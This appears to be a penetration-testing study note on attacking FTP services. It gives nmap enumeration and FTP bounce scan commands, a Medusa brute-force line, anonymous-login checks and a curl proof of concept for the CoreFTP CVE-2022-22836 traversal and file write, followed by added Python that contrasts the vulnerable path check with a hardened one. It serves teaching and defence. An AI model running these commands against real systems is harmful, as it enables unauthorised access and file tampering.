
# FTP(21)

## Attacking Common Services — FTP

***

### Overview

* FTP = file transfer + directory operations
* Default port: **TCP/21**
* Attack vectors: misconfigurations, excessive privileges, known CVEs

***

### Enumeration

```bash
sudo nmap -sC -sV -p 21 <IP>
```

* `-sC` runs the default NSE scripts, including `ftp-anon`, which checks whether anonymous login is accepted
* `-sV` grabs banner + version
* Can also use `nc <IP> 21` for manual banner grab

***

### Misconfigurations

#### Anonymous Login

```bash
ftp <IP>
# Username: anonymous
# Password: (blank)
```

**If anonymous login allowed → check read/write permissions**

| Command      | Action                  |
| ------------ | ----------------------- |
| `ls` / `cd`  | navigate directories    |
| `get <file>` | download single file    |
| `mget *`     | download multiple files |
| `put <file>` | upload single file      |
| `mput *`     | upload multiple files   |

**Risk:** sensitive files readable, or malicious scripts uploadable (e.g. PHP RCE via path traversal chain)

***

### Attacks

#### Brute Force — Medusa

```bash
medusa -u <user> -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp
```

> Prefer **password spraying** over full brute force: modern services lock accounts or rate-limit after repeated failed attempts

***

#### FTP Bounce Attack

**Concept:** abuse `PORT` command on exposed FTP server to scan internal hosts not reachable directly

```
Attacker → FTP_DMZ (exposed) → PORT command → scan Internal_DMZ
```

```bash
nmap -Pn -v -n -p 80 -b anonymous:password@<FTP_IP> <INTERNAL_IP>
```

* Modern FTP servers block this by default
* Still works if misconfigured

***

### Key Flags / Options Cheatsheet

| Tool   | Flag            | Purpose                 |
| ------ | --------------- | ----------------------- |
| nmap   | `-sC -sV -p 21` | enum + banner           |
| nmap   | `-b`            | FTP bounce scan         |
| medusa | `-u` / `-U`     | single user / user list |
| medusa | `-P`            | password list           |
| medusa | `-M ftp`        | target protocol         |
| medusa | `-h`            | target host             |

### CVE-2022-22836 — CoreFTP Path Traversal + Arbitrary File Write

***

#### Vulnerability Summary

* **Service:** CoreFTP before build 727
* **Type:** Authenticated directory traversal + arbitrary file write
* **Trigger:** HTTP PUT request not properly validated
* **Result:** Write files outside the FTP service's restricted directory

***

#### Exploit

```bash
curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<pass> \
--data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
```

| Flag            | Purpose                                                     |
| --------------- | ----------------------------------------------------------- |
| `-k`            | skip TLS certificate verification                           |
| `-X PUT`        | use PUT instead of POST                                     |
| `--basic -u`    | basic auth                                                  |
| `--data-binary` | file content                                                |
| `--path-as-is`  | prevents curl from resolving `../` — keeps traversal intact |

***

**Phase 1 — Directory Traversal (escape the FTP root)**

The authorization check only validates access to the FTP root folder and does not normalize the requested path. Because the `../` sequences carry the request outside that folder before the check applies, the restriction is bypassed entirely.

**Phase 2 — Arbitrary File Write (write anywhere)**

Once the path restriction is bypassed, the write operation has no remaining guard. The service writes whatever content you passed in `--data-binary` to whatever path you specified.

**Verify on target:**

```cmd
type C:\whoops
REM Output: PoC.
```

***

#### Key Takeaway

Two separate security failures chained together:

1. Path sanitization missing → traversal succeeds
2. Write permission check happens after traversal → write has no guard left

Real-world impact: overwrite system files, drop web shells, achieve RCE.
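Both failures side by side, as an added example (not CoreFTP's code or the page's own): the vulnerable prefix test on the raw path, a hardened resolve-then-verify version, and a write handler that only writes after the path is proven to stay under the root. The root directory and the in-memory "filesystem" are constructed; `posixpath` is used so the result is the same on every OS.

```python
import posixpath

# Constructed example: the directory the FTP user is supposed to be confined to.
FTP_ROOT = "/srv/ftp/users/alice"


def naive_allows(root, requested):
    """The vulnerable pattern: a prefix test on the raw, un-normalized path.

    '/srv/ftp/users/alice/../../../../../../whoops' still starts with the root
    string, so the traversal passes and nothing downstream re-checks it.
    """
    candidate = root.rstrip("/") + "/" + requested.lstrip("/")
    return candidate.startswith(root)


def resolve_inside_root(root, requested):
    """Hardened: normalize first, then prove the result is still under root.

    Returns the resolved absolute path, or None when the request escapes.
    A real server must also decode URL encoding before this step, not after.
    """
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def handle_put(root, requested, data, fs):
    """Write handler with the guard in the right place: resolve, then write.

    `fs` is an in-memory dict standing in for the filesystem.
    Returns True if the write happened, False if it was refused.
    """
    target = resolve_inside_root(root, requested)
    if target is None:
        return False
    fs[target] = data
    return True


if __name__ == "__main__":
    traversal = "../../../../../../whoops"     # the path from the PoC above
    print("naive check allows traversal:", naive_allows(FTP_ROOT, traversal))
    print("hardened resolve:", resolve_inside_root(FTP_ROOT, traversal))
    fs = {}
    print("PUT refused:", not handle_put(FTP_ROOT, traversal, b"PoC.", fs))
    print("PUT inside root:", handle_put(FTP_ROOT, "docs/notes.txt", b"ok", fs), fs)
```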
